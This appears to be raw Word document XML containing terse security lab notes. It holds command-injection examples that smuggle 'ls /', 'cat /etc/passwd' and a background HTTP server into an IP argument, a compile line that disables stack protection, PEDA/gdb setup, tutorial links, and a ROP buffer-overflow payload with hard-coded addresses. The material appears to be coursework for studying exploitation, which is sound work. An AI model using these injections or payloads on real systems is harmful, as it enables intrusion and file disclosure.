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972A2" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:t>Injection Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F94E2" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:t>python3 injection_script.py "8.8.8.8; ls /"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF6862" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B45FFB" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:t>python3 injection_script.py "8.8.8.8; cat /etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD2D4A2" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65342A62" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:t>python3 injection_script.py "8.8.8.8; nohup python3 -m http.server 8080 &amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88C03B" w14:textId="77777777" w:rsidR="00892148" w:rsidRDefault="00892148"/>
    <w:p w14:paraId="640BA3CF" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gcc -fno-stack-protector -z execstack -o vulnerable vulnerable.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D982686" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410AB2DA" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:t>-fno-stack-protector: Disables stack protection that detects stack smashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527C3CAC" w14:textId="77777777" w:rsidR="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:t>-z execstack: Allows code to be executed from the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EB39ED" w14:textId="77777777" w:rsidR="00892148" w:rsidRDefault="00892148" w:rsidP="00892148"/>
    <w:p w14:paraId="527FEE63" w14:textId="1D1E7B0E" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00892148">
        <w:t>isas rop1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %% Memory location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5130C70D" w14:textId="77777777" w:rsidR="00892148" w:rsidRDefault="00892148"/>
    <w:p w14:paraId="37AB72C5" w14:textId="77777777" w:rsidR="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:tooltip="https://slava-moskvin.medium.com/gdb-tutorial-for-reverse-engineers-breakpoints-modifying-memory-and-printing-its-contents-46280ac37aad" w:history="1">
        <w:r w:rsidRPr="00892148">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://slava-moskvin.medium.com/gdb-tutorial-for-reverse-engineers-breakpoints-modifying-memory-and-printing-its-contents-46280ac37aad</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FEA64FE" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148"/>
    <w:p w14:paraId="475EB2A1" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:tooltip="https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/rop-chaining-return-oriented-programming" w:history="1">
        <w:r w:rsidRPr="00892148">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/rop-chaining-return-oriented-programming</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16F793C5" w14:textId="77777777" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148"/>
    <w:p w14:paraId="2A1EB484" w14:textId="77777777" w:rsidR="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:t>git clone https://github.com/longld/peda.git ~/peda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ECB8C5" w14:textId="5E31733C" w:rsidR="00892148" w:rsidRPr="00892148" w:rsidRDefault="00892148" w:rsidP="00892148">
      <w:r w:rsidRPr="00892148">
        <w:br/>
        <w:t>echo "source ~/peda/peda.py" &gt;&gt; ~/.gdbinit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0365F3B7" w14:textId="77777777" w:rsidR="00892148" w:rsidRDefault="00892148"/>
    <w:p w14:paraId="759C9941" w14:textId="77777777" w:rsidR="00892148" w:rsidRDefault="00892148"/>
    <w:p w14:paraId="6C3E0680" w14:textId="77777777" w:rsidR="00892148" w:rsidRDefault="00892148"/>
    <w:p w14:paraId="49C26EE3" w14:textId="13B0446F" w:rsidR="00081AC6" w:rsidRDefault="00B5155A">
      <w:r w:rsidRPr="00B5155A">
        <w:t>sudo bpftrace rop_analysis.bt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4680ECB8" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRDefault="00B5155A"/>
    <w:p w14:paraId="4FAC4858" w14:textId="4D62829F" w:rsidR="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A">
      <w:r w:rsidRPr="00B5155A">
        <w:t>./rop1a "$(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*108 +b"BBBB"+ b"\xa9\x61\x55\x56" + b"\xd4\x61\x55\x56" + b"\xff\x61\x55\x56" + b"\x40\xfa\xdf\xf7")')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A66382F" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A"/>
    <w:p w14:paraId="12064A36" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A"/>
    <w:p w14:paraId="437464EE" w14:textId="2E46CC7F" w:rsidR="00B5155A" w:rsidRPr="00B5155A" w:rsidRDefault="00850B5E" w:rsidP="00B5155A">
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00B5155A" w:rsidRPr="00B5155A">
        <w:t>fa attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6350E70F" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRPr="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A"/>
    <w:p w14:paraId="31BD1A2B" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRPr="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A">
      <w:r w:rsidRPr="00B5155A">
        <w:t>gdb-peda$ set $eip = 0x565561ef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA1B6CB" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRPr="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A">
      <w:r w:rsidRPr="00B5155A">
        <w:t>gdb-peda$ set $esp = $esp + 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE550C" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRPr="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A"/>
    <w:p w14:paraId="3E419C41" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRPr="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A">
      <w:r w:rsidRPr="00B5155A">
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76143CDB" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRPr="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A"/>
    <w:p w14:paraId="016F9633" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRPr="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A">
      <w:r w:rsidRPr="00B5155A">
        <w:t>set $eip = (void (*)())funcC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1C0BA" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRPr="00B5155A" w:rsidRDefault="00B5155A" w:rsidP="00B5155A">
      <w:r w:rsidRPr="00B5155A">
        <w:t>set $esp = $esp + 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15455F68" w14:textId="77777777" w:rsidR="00B5155A" w:rsidRDefault="00B5155A"/>
    <w:sectPr w:rsidR="00B51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5A"/>
    <w:rsid w:val="00081AC6"/>
    <w:rsid w:val="004A22DB"/>
    <w:rsid w:val="00514C69"/>
    <w:rsid w:val="00547F81"/>
    <w:rsid w:val="00786C7F"/>
    <w:rsid w:val="00834197"/>
    <w:rsid w:val="00850B5E"/>
    <w:rsid w:val="00892148"/>
    <w:rsid w:val="00B5155A"/>
    <w:rsid w:val="00B94D6E"/>
    <w:rsid w:val="00CA789D"/>
    <w:rsid w:val="00D6779F"/>
    <w:rsid w:val="00E84C5A"/>
    <w:rsid w:val="00F3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9E21D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A3D80BED-D94F-A34F-B3AC-9FB82A20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5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5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5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5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5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5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5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5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21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red.team/offensive-security/code-injection-process-injection/binary-exploitation/rop-chaining-return-oriented-programming" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://slava-moskvin.medium.com/gdb-tutorial-for-reverse-engineers-breakpoints-modifying-memory-and-printing-its-contents-46280ac37a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Rauniyar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ashish Rauniyar</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-27T08:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-27T10:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>